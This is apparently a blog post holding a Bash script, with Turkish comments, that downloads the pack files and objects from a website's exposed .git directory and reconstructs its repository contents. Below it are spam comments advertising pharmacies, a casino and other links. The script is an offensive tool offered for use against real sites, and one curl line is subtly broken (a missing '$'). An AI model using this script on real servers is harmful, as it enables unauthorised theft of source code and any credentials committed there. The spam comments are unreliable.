#https://test.com/.git/objects/info/packs adresine yanıt veren tüm web siteleri
#için geçerli olabilir pack dosyasını verify ederek tüm commitlere erişmeyi
#ve objects dosylarını çözümleyerek git reposunu okumayı hedefler

#!/bin/bash

url="https://test.com/"

git init
mkdir icerikler

curl "$url.git/objects/info/packs" --output bilgi.txt
cat bilgi.txt | cut -d ' ' -f2 > packlist.txt
echo "" > commits.txt

while read -r line;
do
        curl "$url.git/objects/pack/$line" --output ".git/objects/pack/$line"
        curl "$url.git/objects/pack/$(echo $line | cut -d '.' -f1).idx" --output ".git/objects/pack/$(echo $line | cut -d '.' -f1).idx"
        git verify-pack -v ".git/objects/pack/$line" >> commits.txt
        git verify-pack -v ".git/objects/pack/$line" | cut -d ' ' -f1 >> commitsHash.txt
done < packlist.txt

echo "" > sonuc.txt

while read -r commits;
do
        if (( $(jobs -p | wc -l) > 100 ))
        then
                sleep 5s
        fi
        echo "$commits Dosyası yükleniyor..."
        mkdir .git/objects/${commits:0:2}
        curl "$url.git/objects/${commits:0:2}/{commits:2:40}" --output ".git/objects/${commits:0:2}/${commits:2:40}" >> /dev/null 2>&1 &
        echo "$commits açılıyor."
        git cat-file -p $commits >> icerikler/$commits
done < commitsHash.txt

exit
Categories: Bash language

7,322 Comments

Bambu4d · 27/01/2024 at 05:38

Hi there to all, for the reason that I am genuinely keen of reading this website’s post to be updated on a regular basis. It carries pleasant stuff.

Ronalddault · 27/01/2024 at 06:33

http://mexicanpharmacy.win/# mexico drug stores pharmacies mexicanpharmacy.win
online canadian pharmacy no prescription needed

praca kierowca ce szwajcaria · 27/01/2024 at 06:38

If you desire to take a good deal from this piece of writing then you have to apply these strategies
to your won weblog.

windownapkcom · 27/01/2024 at 06:54

1win
1win
1win
1win
1win
1win
1win
1win
1win
1win
1win
1win
1win
1win
1win

Install application online casino 1win – play right now!

1win
1win
1win
1win
1win
1win
1win
1win
1win
1win
1win
1win
1win
1win
1win

scam · 27/01/2024 at 08:16

wow, amazing

tuia de vanzare · 27/01/2024 at 08:35

Whats Happening i am new to this, I stumbled upon this I have discovered It absolutely useful and it has helped me out loads. I am hoping to give a contribution & help other customers like its aided me. Good job.

slash news · 27/01/2024 at 08:56

The latest movie and television news, reviews, film trailers, exclusive interviews, and opinions. https://slashnews.us/

porn · 27/01/2024 at 09:20

nice content!nice history!! boba 😀

gard viu veșnic verde · 27/01/2024 at 09:24

Hello, Neat post. There’s a problem with your website in internet explorer, may test this… IE still is the marketplace chief and a huge part of people will miss your fantastic writing due to this problem.

tuia smarald · 27/01/2024 at 10:07

Magnificent site. Lots of helpful information here. I’m sending it to some friends ans also sharing in delicious. And obviously, thank you to your effort!

Leave a Reply

Avatar placeholder